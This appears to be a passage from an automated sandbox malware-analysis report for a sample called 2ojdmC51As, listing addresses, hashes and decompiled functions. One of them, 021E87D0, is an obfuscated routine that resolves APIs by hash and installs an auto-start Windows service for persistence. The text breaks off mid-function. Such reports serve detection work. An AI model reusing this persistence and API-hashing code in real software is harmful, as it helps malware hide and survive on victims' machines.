0x021e68f5
0x021e69bc
0x021e69bc
0x00000000
0x021e68fb
0x021e68fb
0x021e6903
0x021e6908
0x021e6910
0x021e6918
0x021e691d
0x021e6921
0x021e6959
0x021e6959
0x021e6923
0x021e6932
0x021e6937
0x021e693a
0x021e693e
0x021e6950
0x021e6952
0x021e6952
0x021e695b
0x021e6963
0x021e6968
0x021e6970
0x021e697c
0x021e697e
0x021e6983
0x021e6985
0x021e6996
0x021e699b
0x021e69a0
0x021e69a5
0x021e69a8
0x021e69aa
0x021e69ac
0x00000000
0x021e69b2
0x021e69b2
0x00000000
0x021e69b4
0x021e69b4
0x021e69b6
0x00000000
0x00000000
0x00000000
0x00000000
0x021e69b6
0x021e69b2
0x00000000
0x00000000
0x00000000
0x021e6985
0x021e68f5
0x021e68a1
0x021e68a1
0x021e68d7
0x021e68dc
0x00000000
0x021e68a3
0x021e68a3
0x021e68a8
0x021e68c9
0x021e68cd
0x00000000
0x021e68aa
0x021e68aa
0x021e68af
0x00000000
0x021e68b5
0x021e68b5
0x021e68ba
0x00000000
0x021e68ba
0x021e68af
0x021e68a8
0x021e68a1
0x021e689f
0x021e6894
0x021e688e
0x021e6883
0x00000000
0x021e687d
0x021e69be
0x021e69be
0x021e69d0
0x00000000
0x021e69d0

Strings

ke@5, xrefs: 021E6D6F
ke@5, xrefs: 021E6D01
W$, xrefs: 021E6AA8
l!`u, xrefs: 021E6DF3

Memory Dump Source

Source File: 00000000.00000002.231384792.00000000021E1000.00000020.00000001.sdmp, Offset: 021E0000, based on PE: true

Associated: 00000000.00000002.231376146.00000000021E0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.231395549.00000000021ED000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.231403140.00000000021F0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21e0000_2ojdmC51As.jbxd

Yara matches

Similarity

API ID:
String ID: W$$ke@5$ke@5$l!`u
API String ID: 0-26469448
Opcode ID: 51faf4a1b85486cf7d37f9ca34f14f7fdbb94cd7237deaefce31a72093ec719c
Instruction ID: 5d110c2c7356f2ae5d09ab644183f109a48690523c2a58f9cf0e9154d2155796
Opcode Fuzzy Hash: 51faf4a1b85486cf7d37f9ca34f14f7fdbb94cd7237deaefce31a72093ec719c
Instruction Fuzzy Hash: 9422F771A84B41CFCF28EE78AD4412E76EAABA0744F94092EE553D7254EB30CD45CB93

Uniqueness

Uniqueness Score: -1.00%

Function 00406204, Relevance: 4.6, APIs: 3, Instructions: 75
timeCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00406204(intOrPtr* _a4) {
				struct _SYSTEMTIME _v20;
				struct _SYSTEMTIME _v36;
				short _v54;
				struct _TIME_ZONE_INFORMATION _v208;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				intOrPtr _t31;
				intOrPtr* _t36;
				void* _t37;
				void* _t39;
				void* _t43;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t47;

				GetLocalTime( &_v20);
				GetSystemTime( &_v36);
				_t43 = _v36.wMinute -  *0x439ce2; // 0x0
				if(_t43 != 0) {
					L6:
					_t23 = GetTimeZoneInformation( &_v208);
					if(_t23 == 0xffffffff) {
						_t24 = _t23 | 0xffffffff;
					} else {
						if(_t23 != 2 || _v54 == 0 || _v208.DaylightBias == 0) {
							_t24 = 0;
						} else {
							_t24 = 1;
						}
					}
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t37 = _t37;
					 *0x439cd0 = _t24;
					_t39 = _t39;
					L14:
					_t31 = E00408F71(_t37, _t39, _v20.wYear & 0x0000ffff, _v20.wMonth & 0x0000ffff, _v20.wDay & 0x0000ffff, _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff, _v20.wSecond & 0x0000ffff, _t24);
					_t36 = _a4;
					if(_t36 == 0) {
						return _t31;
					}
					 *_t36 = _t31;
					return _t31;
				}
				_t44 = _v36.wHour -  *0x439ce0; // 0x0
				if(_t44 != 0) {
					goto L6;
				}
				_t45 = _v36.wDay -  *0x439cde; // 0x0
				if(_t45 != 0) {
					goto L6;
				}
				_t46 = _v36.wMonth -  *0x439cda; // 0x0
				if(_t46 != 0) {
					goto L6;
				}
				_t47 = _v36.wYear -  *0x439cd8; // 0x0
				if(_t47 != 0) {
					goto L6;
				}
				_t24 =  *0x439cd0; // 0x0
				goto L14;
			}

0x00406211
0x0040621b
0x00406225
0x0040622c
0x00406269
0x00406270
0x00406279
0x00406296
0x0040627b
0x0040627e
0x00406292
0x0040628d
0x0040628f
0x0040628f
0x0040627e
0x004062a3
0x004062a4
0x004062a5
0x004062a6
0x004062a7
0x004062a8
0x004062ad
0x004062ae
0x004062cd
0x004062d2
0x004062da
0x004062df
0x004062df
0x004062dc
0x00000000
0x004062dc
0x00406232
0x00406239
0x00000000
0x00000000
0x0040623f
0x00406246
0x00000000
0x00000000
0x0040624c
0x00406253
0x00000000
0x00000000
0x00406259
0x00406260
0x00000000
0x00000000
0x00406262
0x00000000

APIs

GetLocalTime.KERNEL32(?), ref: 00406211
GetSystemTime.KERNEL32(?), ref: 0040621B
GetTimeZoneInformation.KERNEL32(?), ref: 00406270

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Time$InformationLocalSystemZone
String ID:
API String ID: 2475273158-0
Opcode ID: 98c329cfe65f37a8269ab78acdfd43f0202a9ef7ae8bfeec04cd482c6d0154ea
Instruction ID: 3f1c4332e89f5b2d1d6816171f69ac3eb852245dda195b9ef9698e6a055d0bd8
Opcode Fuzzy Hash: 98c329cfe65f37a8269ab78acdfd43f0202a9ef7ae8bfeec04cd482c6d0154ea
Instruction Fuzzy Hash: 1B214F2990001AE5CB20AFD9E8045FE73B8BB05710F45116AF812A61D0E7785DD2D77C

Uniqueness

Uniqueness Score: -1.00%

Function 00404F00, Relevance: 4.5, APIs: 3, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00404F00(struct HWND__* _a4, signed int _a8) {
				struct _WINDOWPLACEMENT _v48;
				int _t16;

				if(E00404DD2() == 0) {
					if((_a8 & 0x00000003) == 0) {
						if(IsIconic(_a4) == 0) {
							_t16 = GetWindowRect(_a4,  &(_v48.rcNormalPosition));
						} else {
							_t16 = GetWindowPlacement(_a4,  &_v48);
						}
						if(_t16 == 0) {
							return 0;
						} else {
							return E00404EAA( &(_v48.rcNormalPosition), _a8);
						}
					}
					return 0x12340042;
				}
				return  *0x43960c(_a4, _a8);
			}

0x00404f0d
0x00404f21
0x00404f35
0x00404f4d
0x00404f37
0x00404f3e
0x00404f3e
0x00404f55
0x00000000
0x00404f57
0x00000000
0x00404f5e
0x00404f55
0x00000000
0x00404f23
0x00000000

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a45996cf663fdf707e0f7fa25b57eee4b9f79d1199d04ed752b9cdfe3172fb0d
Instruction ID: b4a2923728d38d9147ff113c7bedcff831c7b24fed2f7eef246683424e6392e6
Opcode Fuzzy Hash: a45996cf663fdf707e0f7fa25b57eee4b9f79d1199d04ed752b9cdfe3172fb0d
Instruction Fuzzy Hash: 1DF031B150410ABACF01AF71DC449AE7BA8AF84344B448032FA15E51A1DB38DA12DB59

Uniqueness

Uniqueness Score: -1.00%

Function 004198B0, Relevance: 4.5, APIs: 3, Instructions: 36
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004198B0(void* __ecx, void* __ebp, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t7;
				void* _t14;
				void* _t16;
				struct HWND__** _t20;

				_t21 = __ebp;
				_t7 = _a4;
				_t20 = _t7 + 0x1c;
				_t16 = E00413740(__ebp, GetParent( *(_t7 + 0x1c)));
				if(E00416753(_t16, 0x42cc08) == 0) {
					L4:
					return 0;
				}
				if(_a8 != 0) {
					L5:
					return _t16;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t14 = E00413740(_t21, GetParent( *_t20));
					if(_t14 == 0) {
						goto L5;
					}
					_t6 = _t14 + 0x1c; // 0x1c
					_t20 = _t6;
					if(IsIconic( *(_t14 + 0x1c)) == 0) {
						continue;
					}
					goto L4;
				}
				goto L5;
			}

0x004198b0
0x004198b0
0x004198c0
0x004198cb
0x004198db
0x00419902
0x00000000
0x00419902
0x004198e2
0x00419906
0x00000000
0x00000000
0x00000000
0x00000000
0x004198e4
0x004198e4
0x004198e9
0x004198f0
0x00000000
0x00000000
0x004198f5
0x004198f5
0x00419900
0x00000000
0x00000000
0x00000000
0x00419900
0x00000000

APIs

GetParent.USER32(?), ref: 004198C3
GetParent.USER32(?), ref: 004198E6
IsIconic.USER32 ref: 004198F8

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Parent$Iconic
String ID:
API String ID: 344791563-0
Opcode ID: e9a311a3077ddf23aba01d9137a49aebb9716b45f459054c4e6efcb7b22f56b0
Instruction ID: 95d136e54c1882d44521d8e3266ce7aea084792c8d1a411097e8097360147bcb
Opcode Fuzzy Hash: e9a311a3077ddf23aba01d9137a49aebb9716b45f459054c4e6efcb7b22f56b0
Instruction Fuzzy Hash: 7AF0B4B1320205BEDB206F22DC54E9B775CEF80795B15843AF511D7261D738DC86C764

Uniqueness

Uniqueness Score: -1.00%

Function 00412ABD, Relevance: 4.5, APIs: 3, Instructions: 29
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00412ABD(intOrPtr _a4) {
				intOrPtr _t6;
				void* _t13;

				_t6 = _a4;
				if( *((intOrPtr*)(_t6 + 4)) != 0x100 ||  *((intOrPtr*)(_t6 + 8)) != 0x70 || ( *(_t6 + 0xc) >> 0x00000010 & 0x00000040) != 0 || GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
					return 0;
				} else {
					_t13 = 1;
					return _t13;
				}
			}

0x00412abd
0x00412ac9
0x00000000
0x00412afd
0x00412aff
0x00000000
0x00412aff

APIs

GetKeyState.USER32(00000010), ref: 00412AE4
GetKeyState.USER32(00000011), ref: 00412AED
GetKeyState.USER32(00000012), ref: 00412AF6

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: State
String ID:
API String ID: 1649606143-0
Opcode ID: a8f8163b5a00785f8c589019fe7ab30a7541db7938f29a10131867e1fa7de398
Instruction ID: f060bf0bb44e7932bfef4c0a17985a51a6ccefe8c5352f6dc740857419941b1b
Opcode Fuzzy Hash: a8f8163b5a00785f8c589019fe7ab30a7541db7938f29a10131867e1fa7de398
Instruction Fuzzy Hash: EDE092356082599DEE12DE408B02FD567B0AF20790F418467EA84EB091C6E8BCE7D77D

Uniqueness

Uniqueness Score: -1.00%

Function 021E87D0, Relevance: 3.9, Strings: 3, Instructions: 164
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E021E87D0() {
				char _v520;
				void* _v524;
				intOrPtr _v576;
				void* __ebx;
				void* __ebp;
				void* _t11;
				intOrPtr* _t12;
				intOrPtr* _t16;
				intOrPtr* _t21;
				void* _t24;
				intOrPtr* _t32;
				void* _t35;
				intOrPtr _t40;
				intOrPtr* _t53;
				intOrPtr _t58;
				void* _t59;
				intOrPtr _t60;
				short* _t62;
				short** _t63;
				void* _t64;
				void* _t66;
				void* _t67;

				_t64 =  &_v524;
				_t58 = 0;
				_t11 = 0x388705c7;
				_v524 = 0;
				_t63 = _v524;
				_t35 = _v524;
				_t60 = _v524;
				while(1) {
					_t66 = _t11 - 0x2793b377;
					if(_t66 > 0) {
						goto L21;
					}
					L2:
					if(_t66 == 0) {
						E021E5070(_t35, _t63);
						_t11 = 0x93584cb;
						continue;
					} else {
						_t67 = _t11 - 0x124353fe;
						if(_t67 > 0) {
							if(_t11 == 0x2169f629) {
								_t21 =  *0x21eddb8;
								if(_t21 == 0) {
									_t21 = E021E3E80(_t35, E021E3F20(0x667fdee), 0x505cb3fe, _t63);
									 *0x21eddb8 = _t21;
								}
								 *_t21(_t35);
								L36:
								return _t58;
							} else {
								goto L18;
							}
						} else {
							if(_t67 == 0) {
								_t24 = E021E34C0(0x21ed8f0);
								_t53 =  *0x21edc60;
								_t59 = _t24;
								if(_t53 == 0) {
									_t53 = E021E3E80(_t35, E021E3F20(0xe66945e6), 0xcca28b0d, _t63);
									 *0x21edc60 = _t53;
								}
								_t40 =  *0x21ee2ec;
								 *_t53( &_v520, 0x104, _t59, _t40 + 0x5c, _t40 + 0x278);
								_t64 = _t64 + 0x14;
								E021E3460(_t59);
								_t58 = _v524;
								_t11 = 0x3acbd78;
								continue;
							} else {
								if(_t11 == 0x3acbd78) {
									_t62 =  *0x21ee2ec + 0x278;
									while( *_t62 != 0x5c) {
										_t62 = _t62 + 2;
									}
									_t60 = _t62 + 2;
									_t11 = 0x2d3078b2;
									continue;
								} else {
									if(_t11 == 0x93584cb) {
										_t32 =  *0x21eddb8;
										if(_t32 == 0) {
											_t32 = E021E3E80(_t35, E021E3F20(0x667fdee), 0x505cb3fe, _t63);
											 *0x21eddb8 = _t32;
										}
										 *_t32(_t63);
										L10:
										_t11 = 0x2169f629;
										continue;
										do {
											while(1) {
												_t66 = _t11 - 0x2793b377;
												if(_t66 > 0) {
													goto L21;
												}
												goto L2;
											}
											goto L21;
										} while (_t11 != 0x33cd76b6);
										return _t58;
									}
								}
							}
						}
					}
					L37:
					L21:
					if(_t11 == 0x2d3078b2) {
						_t12 =  *0x21ee0f4;
						if(_t12 == 0) {
							_t12 = E021E3E80(_t35, E021E3F20(0x667fdee), 0x7f692adf, _t63);
							 *0x21ee0f4 = _t12;
						}
						_t35 =  *_t12(0, 0, 0xf003f);
						if(_t35 == 0) {
							goto L36;
						} else {
							_t11 = 0x34ee6736;
							continue;
						}
					} else {
						if(_t11 == 0x34ee6736) {
							_t16 =  *0x21edb50;
							if(_t16 == 0) {
								_t16 = E021E3E80(_t35, E021E3F20(0x667fdee), 0xc2730d45, _t63);
								 *0x21edb50 = _t16;
							}
							_t63 =  *_t16(_t35, _t60, _t60, 2, 0x10, 2, 0,  &_v520, 0, 0, 0, 0, 0);
							if(_t63 == 0) {
								goto L10;
							} else {
								_t58 = 1;
								_t11 = 0x2793b377;
								_v576 = 1;
							}
							continue;
						} else {
							if(_t11 != 0x388705c7) {
								goto L18;
							} else {
								_t11 = 0x124353fe;
								continue;
							}
						}
					}
					goto L37;
				}
			}

0x021e87d0
0x021e87da
0x021e87dc
0x021e87e1
0x021e87e5
0x021e87e9
0x021e87ed
0x021e87f1
0x021e87f1
0x021e87f6
0x00000000
0x00000000
0x021e87fc
0x021e87fc
0x021e8908
0x021e890d
0x00000000
0x021e8802
0x021e8802
0x021e8807
0x021e88e6
0x021e89d2
0x021e89d9
0x021e89ec
0x021e89f1
0x021e89f1
0x021e89f7
0x021e89f9
0x021e8a05
0x00000000
0x00000000
0x00000000
0x021e880d
0x021e880d
0x021e887c
0x021e8881
0x021e8887
0x021e888b
0x021e88a3
0x021e88a5
0x021e88a5
0x021e88ab
0x021e88c7
0x021e88c9
0x021e88ce
0x021e88d3
0x021e88d7
0x00000000
0x021e880f
0x021e8814
0x021e8855
0x021e885f
0x021e8861
0x021e8864
0x021e886a
0x021e886d
0x00000000
0x021e8816
0x021e881b
0x021e8821
0x021e8828
0x021e883b
0x021e8840
0x021e8840
0x021e8846
0x021e8848
0x021e8848
0x021e884d
0x021e87f1
0x021e87f1
0x021e87f1
0x021e87f6
0x00000000
0x00000000
0x00000000
0x021e87f6
0x00000000
0x021e87f1
0x021e8903
0x021e8903
0x021e881b
0x021e8814
0x021e880d
0x021e8807
0x00000000
0x021e8917
0x021e891c
0x021e8993
0x021e899a
0x021e89ad
0x021e89b2
0x021e89b2
0x021e89c2
0x021e89c6
0x00000000
0x021e89c8
0x021e89c8
0x00000000
0x021e89c8
0x021e891e
0x021e8923
0x021e8936
0x021e893d
0x021e8950
0x021e8955
0x021e8955
0x021e8976
0x021e897a
0x00000000
0x021e8980
0x021e8980
0x021e8985
0x021e898a
0x021e898a
0x00000000
0x021e8925
0x021e892a
0x00000000
0x021e892c
0x021e892c
0x00000000
0x021e892c
0x021e892a
0x021e8923
0x00000000
0x021e891c

Strings

6g4, xrefs: 021E891E
6g4, xrefs: 021E89C8
Ei, xrefs: 021E888D

Memory Dump Source

Source File: 00000000.00000002.231384792.00000000021E1000.00000020.00000001.sdmp, Offset: 021E0000, based on PE: true

Associated: 00000000.00000002.231376146.00000000021E0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.231395549.00000000021ED000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.231403140.00000000021F0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21e0000_2ojdmC51As.jbxd

Yara matches

Similarity

API ID:
String ID: 6g4$6g4$Ei
API String ID: 0-2833161213
Opcode ID: 9869beb684cd1e1a07ca0d700aba3802af8fcd098312768929bf27b0f8e8a688
Instruction ID: 163f8f8528caecf5157a7af6d4ef5f8c0202a132bcb7922e6248913c334704cc
Opcode Fuzzy Hash: 9869beb684cd1e1a07ca0d700aba3802af8fcd098312768929bf27b0f8e8a688
Instruction Fuzzy Hash: EA51F865FC07019BDE24AEA95C45B3F33DAABC4304F160969F927DB2A0DB20DC808792

Uniqueness

Uniqueness Score: -1.00%

Function 004145CA, Relevance: 3.4, APIs: 2, Instructions: 422
COMMONCrypto

Download Yara Rule

C-Code - Quality: 46%

			E004145CA(intOrPtr* __ecx) {
				signed int _t137;
				signed int _t140;
				signed int _t141;
				signed int _t145;
				signed int _t147;
				signed int _t148;
				intOrPtr _t150;
				signed int _t151;
				signed int* _t152;
				signed char _t155;
				unsigned int _t159;
				unsigned int _t167;
				void* _t168;
				signed int _t172;
				signed int* _t176;
				unsigned int _t178;
				intOrPtr* _t179;
				unsigned int _t180;
				intOrPtr* _t181;
				signed int _t186;
				unsigned int _t191;
				unsigned int _t203;
				void* _t205;

				_t182 = __ecx;
				E00406520(E00429E60, _t205);
				 *(_t205 - 0x10) =  *(_t205 - 0x10) & 0x00000000;
				_t172 =  *(_t205 + 8);
				_t200 = __ecx;
				if(_t172 != 0x111) {
					if(_t172 != 0x4e) {
						_t203 =  *(_t205 + 0x10);
						if(_t172 == 6) {
							E004134A8(_t182, _t200,  *((intOrPtr*)(_t205 + 0xc)), E00413740(_t205, _t203));
						}
						if(_t172 != 0x20 || E00413509(_t200, _t203, _t203 >> 0x10) == 0) {
							_t137 =  *((intOrPtr*)( *_t200 + 0x28))();
							 *(_t205 - 0x14) = _t137;
							E00425F56(7);
							_t186 =  *(_t205 + 8);
							_t140 = (_t137 & 0x000001ff ^  *(_t205 + 8) & 0x000001ff) + (_t137 & 0x000001ff ^  *(_t205 + 8) & 0x000001ff) * 2;
							_t176 = 0x437ce0 + _t140 * 4;
							_t141 =  *(_t205 - 0x14);
							if(_t186 !=  *(0x437ce0 + _t140 * 4) || _t141 != _t176[2]) {
								 *_t176 = _t186;
								_t176[2] = _t141;
								if(_t141 == 0) {
									L29:
									_t176[1] = _t176[1] & 0x00000000;
									E00425FC6(7);
									goto L30;
								}
								L20:
								while(1) {
									if(_t186 >= 0xc000) {
										_t145 = E00414546( *((intOrPtr*)(_t141 + 4)), 0xc000, 0, 0);
										 *(_t205 + 0x10) = _t145;
										if(_t145 == 0) {
											L28:
											_t147 =  *( *(_t205 - 0x14));
											 *(_t205 - 0x14) = _t147;
											if(_t147 != 0) {
												_t141 =  *(_t205 - 0x14);
												_t186 =  *(_t205 + 8);
												continue;
											}
											goto L29;
										}
										while( *((intOrPtr*)( *((intOrPtr*)(_t145 + 0x10)))) !=  *(_t205 + 8)) {
											_t159 = E00414546(_t145 + 0x18, 0xc000, 0, 0);
											 *(_t205 + 0x10) = _t159;
											if(_t159 != 0) {
												_t145 =  *(_t205 + 0x10);
												continue;
											}
											goto L28;
										}
										_t176[1] = _t145;
										E00425FC6(7);
										_t180 =  *(_t205 + 0x10);
										goto L96;
									}
									_t148 = E00414546( *((intOrPtr*)(_t141 + 4)), _t186, 0, 0);
									 *(_t205 + 0x10) = _t148;
									if(_t148 != 0) {
										_t176[1] = _t148;
										E00425FC6(7);
										_t178 =  *(_t205 + 0x10);
										goto L33;
									}
									goto L28;
								}
							} else {
								_t178 = _t176[1];
								 *(_t205 + 0x10) = _t178;
								E00425FC6(7);
								if(_t178 == 0) {
									L30:
									goto L31;
								}
								if( *(_t205 + 8) < 0xc000) {
									L33:
									_t191 =  *(_t205 + 0x10);
									_t179 =  *((intOrPtr*)(_t178 + 0x14));
									_t150 =  *((intOrPtr*)(_t191 + 0x10));
									if( *((intOrPtr*)(_t191 + 8)) == 0x1a) {
										_t155 = GetVersion();
										asm("sbb eax, eax");
										_t150 = (_t155 & 0x000000f0) + 0x2f;
									}
									_t151 = _t150 - 1;
									if(_t151 > 0x30) {
										goto L100;
									} else {
										switch( *((intOrPtr*)(_t151 * 4 +  &M00414A78))) {
											case 0:
												_push( *((intOrPtr*)(_t205 + 0xc)));
												_push(E00419BA2());
												goto L52;
											case 1:
												_push( *(__ebp + 0xc));
												goto L52;
											case 2:
												_push(__esi >> 0x10);
												__eax = __si;
												_push(__si);
												__eax = E00413740(__ebp,  *(__ebp + 0xc));
												goto L55;
											case 3:
												__ecx = __ebp - 0x24;
												E00419B00(__ebp - 0x24) =  *(__esi + 4);
												 *(__ebp - 4) =  *(__ebp - 4) & 0x00000000;
												__ecx = __ebp - 0x60;
												 *(__ebp - 0x20) =  *(__esi + 4);
												__eax = E0041331F(__ebp - 0x60);
												__eax =  *__esi;
												__esi =  *(__esi + 8);
												_push(__eax);
												 *(__ebp - 4) = 1;
												 *(__ebp - 0x44) = __eax;
												__eax = E00413767();
												if(__eax == 0) {
													__eax =  *(__edi + 0x34);
													if(__eax != 0) {
														__ecx = __eax + 0x20;
														__eax = E00411824(__eax + 0x20,  *(__ebp - 0x44));
														if(__eax != 0) {
															 *(__ebp - 0x28) = __eax;
														}
													}
													__eax = __ebp - 0x60;
												}
												_push(__esi);
												_push(__eax);
												__eax = __ebp - 0x24;
												__ecx = __edi;
												_push(__ebp - 0x24);
												__eax =  *__ebx();
												 *(__ebp - 0x20) =  *(__ebp - 0x20) & 0x00000000;
												 *(__ebp - 0x44) =  *(__ebp - 0x44) & 0x00000000;
												 *(__ebp - 4) =  *(__ebp - 4) & 0x00000000;
												__ecx = __ebp - 0x60;
												 *(__ebp - 0x10) = __ebp - 0x24;
												__eax = E00413DB2(__ebp - 0x60);
												 *(__ebp - 4) =  *(__ebp - 4) | 0xffffffff;
												__ecx = __ebp - 0x24;
												goto L48;
											case 4:
												__ecx = __ebp - 0x24;
												E00419B00(__ebp - 0x24) =  *(__esi + 4);
												_push( *(__esi + 8));
												 *(__ebp - 0x20) =  *(__esi + 4);
												__eax = __ebp - 0x24;
												_push(__ebp - 0x24);
												__ecx = __edi;
												 *(__ebp - 4) = 2;
												__eax =  *__ebx();
												 *(__ebp - 0x20) =  *(__ebp - 0x20) & 0x00000000;
												 *(__ebp - 4) =  *(__ebp - 4) | 0xffffffff;
												 *(__ebp - 0x10) = __ebp - 0x24;
												__ecx = __ebp - 0x24;
												L48:
												__eax = E00419C1F(__ecx);
												goto L100;
											case 5:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax = E00413740(__ebp, __esi);
												goto L54;
											case 6:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												goto L83;
											case 7:
												_push(__esi);
												L52:
												_t154 =  *_t179();
												goto L99;
											case 8:
												L97:
												_push(_t203);
												_push( *((intOrPtr*)(_t205 + 0xc)));
												goto L98;
											case 9:
												_push(__esi);
												_push(E00417635());
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												L54:
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L55:
												_push(__eax);
												__ecx = __edi;
												__eax =  *__ebx();
												goto L99;
											case 0xa:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L100;
											case 0xb:
												_push( *(__ebp + 0xc));
												goto L86;
											case 0xc:
												_push(__esi);
												goto L80;
											case 0xd:
												__esi = __esi >> 0x10;
												__eax = __ax;
												_push(__ax);
												__eax = __si;
												goto L59;
											case 0xe:
												_push(__esi >> 0x10);
												__eax = __si & 0x0000ffff;
												goto L90;
											case 0xf:
												_push(E00413740(__ebp,  *(__ebp + 0xc)));
												_push(E00413740(__ebp, __esi));
												__eax = 0;
												__eax = 0 |  *((intOrPtr*)(__edi + 0x1c)) == __esi;
												goto L62;
											case 0x10:
												_push( *(__ebp + 0xc));
												__eax = E00419BA2();
												goto L64;
											case 0x11:
												_push( *(__ebp + 0xc));
												__eax = E00417635();
												goto L64;
											case 0x12:
												_push(__esi >> 0x10);
												__eax = __si & 0x0000ffff;
												_push(__si & 0x0000ffff);
												_push( *(__ebp + 0xc));
												__eax = E00417635();
												goto L62;
											case 0x13:
												_push( *(__ebp + 0xc));
												goto L69;
											case 0x14:
												_push(__esi >> 0x10);
												__eax = __si & 0x0000ffff;
												goto L72;
											case 0x15:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												L72:
												_push(__eax);
												__eax = E00413740(__ebp,  *(__ebp + 0xc));
												goto L62;
											case 0x16:
												_push(__esi);
												__eax = E00413740(__ebp,  *(__ebp + 0xc));
												L59:
												_push(__eax);
												goto L81;
											case 0x17:
												_push(E00413740(__ebp, __esi));
												L80:
												_push( *(__ebp + 0xc));
												goto L81;
											case 0x18:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax = E00413740(__ebp, __esi);
												goto L88;
											case 0x19:
												__eax =  *(__ebp + 0xc);
												__edx = __ax;
												__eax =  *(__ebp + 0xc) >> 0x10;
												 *((intOrPtr*)(__ebp + 8)) = __edx;
												__eax = __ax;
												 *(__ebp + 0xc) = __eax;
												if( *((intOrPtr*)(__ecx + 0x10)) != 0x1d) {
													_push(__eax);
													_push(__edx);
													L81:
													__ecx = __edi;
													__eax =  *__ebx();
													goto L100;
												}
												_push(E00413740(__ebp, __esi));
												_push( *(__ebp + 0xc));
												_push( *((intOrPtr*)(__ebp + 8)));
												goto L91;
											case 0x1a:
												_push(__esi);
												goto L86;
											case 0x1b:
												_push(__esi);
												__ecx = __edi;
												_push( *(__ebp + 0xc));
												__eax =  *__ebx();
												goto L93;
											case 0x1c:
												__eax = __si;
												__esi = __esi >> 0x10;
												__ecx = __si;
												_push(__si);
												goto L83;
											case 0x1d:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L99;
											case 0x1e:
												goto L100;
											case 0x1f:
												_push(__esi);
												L69:
												__eax = E00413740(__ebp);
												L64:
												_push(__eax);
												L86:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L100;
											case 0x20:
												_push(__esi);
												__eax = E00413740(__ebp,  *(__ebp + 0xc));
												L83:
												_push(__eax);
												L98:
												_t154 =  *_t181();
												L99:
												 *(_t205 - 0x10) = _t154;
												goto L100;
											case 0x21:
												__eax = __si & 0x0000ffff;
												_push(__esi);
												_push(__si & 0x0000ffff);
												__eax =  *(__ebp + 0xc);
												__ecx = __edi;
												__eax =  *(__ebp + 0xc) >> 0x10;
